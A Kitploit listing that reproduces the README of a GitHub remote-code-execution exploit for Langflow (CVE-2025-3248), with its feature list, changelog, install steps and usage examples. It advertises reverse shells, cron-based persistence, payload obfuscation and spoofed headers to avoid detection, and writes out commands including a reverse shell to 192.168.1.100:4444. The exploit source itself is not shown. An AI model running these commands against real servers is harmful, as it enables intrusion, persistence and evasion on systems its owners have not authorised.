Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/0-d3y/langflow-rce-exploit
Privilege EscalationPersistence MechanismsVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access ToolPayload Development
7151 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHub
0-d3y/langflow-rce-exploit

langflow-rce-exploit

Remote Code Execution Exploit for Langflow (CVE-2025-3248) - [ By S4Tech ]

View Repository

Langflow RCE Exploit (CVE-2025-3248)

Python Version License Platform

Remote Code Execution Exploit for Langflow (CVE-2025-3248)

Features

  • Automatic vulnerability detection
  • Multiple exploitation modes:
    • Interactive shell
    • Single command execution
    • Reverse shell connection
  • File upload capability
  • Colorized user interface
  • Multiple reverse shell methods
  • Command history persistence

📌 Changelog (v2.0)

✨ New Features:

  • Advanced payload system with 5 execution methods
  • File upload/download with Base64 encoding
  • Persistence via cron jobs (persist command)
  • Interactive shell upgrades:
    • upload local_path remote_path
    • download remote_path local_path
    • clear command for terminal

🛡️ Security Enhancements:

  • Automatic payload obfuscation (Base64 + random variants)
  • Header rotation per request:
    • Random User-Agent
    • Spoofed X-Forwarded-For IPs
  • HTTPS bypass (self-signed cert support)
  • No redirects to avoid detection

⚡ Technical Improvements:

  • Multi-stage vulnerability verification
  • Enhanced error handling for unstable connections
  • Full session logging to exploit_log.txt
  • Command history persistence (.langflow_shell_history)

📊 Version Comparison:

🐛 Bug Fixes:

  • Fixed HTTPS connection issues
  • Improved handling of special characters in commands
  • Stabilized reverse shell reliability

Requirements

  • Python 3.6 or newer
  • Required libraries:
    • requests
    • colorama
    • readline

Installation

root@kitploit:~
git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt

Usage

root@kitploit:~
python exploit.py <URL> [options]

Available Options:

Examples:

  1. Check vulnerability:
root@kitploit:~
python exploit.py http://target.com
  1. Start interactive shell:
root@kitploit:~
python exploit.py http://target.com --shell
  1. Execute single command:
root@kitploit:~
python exploit.py http://target.com --command "whoami"
  1. Launch reverse shell:
root@kitploit:~
python exploit.py http://target.com --reverse 192.168.1.100 4444

Screenshots

Image.png)

Warning

âڑ ï¸ڈ This tool is for educational and authorized testing purposes only.
âڑ ï¸ڈ Unauthorized use against systems you don't own or have permission to test is illegal.

License

This project is licensed under the MIT License - see the LICENSE file for details.

Author

  • Mr.SaMi
    Twitter
    Instagram

Contributing

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

Download Tool
Featurev1.0v2.0
Payload Methods15
File Transfer❌ Not supported✅ Supported
Persistence❌✅
Stealth LevelBasicAdvanced
Session Logging❌✅
OptionDescription
--shellStart interactive shell
--reverse IP PORTLaunch reverse shell to specified IP:PORT
--command CMDExecute single command
--verboseEnable verbose output
--timeout SECSet request timeout (default: 10s)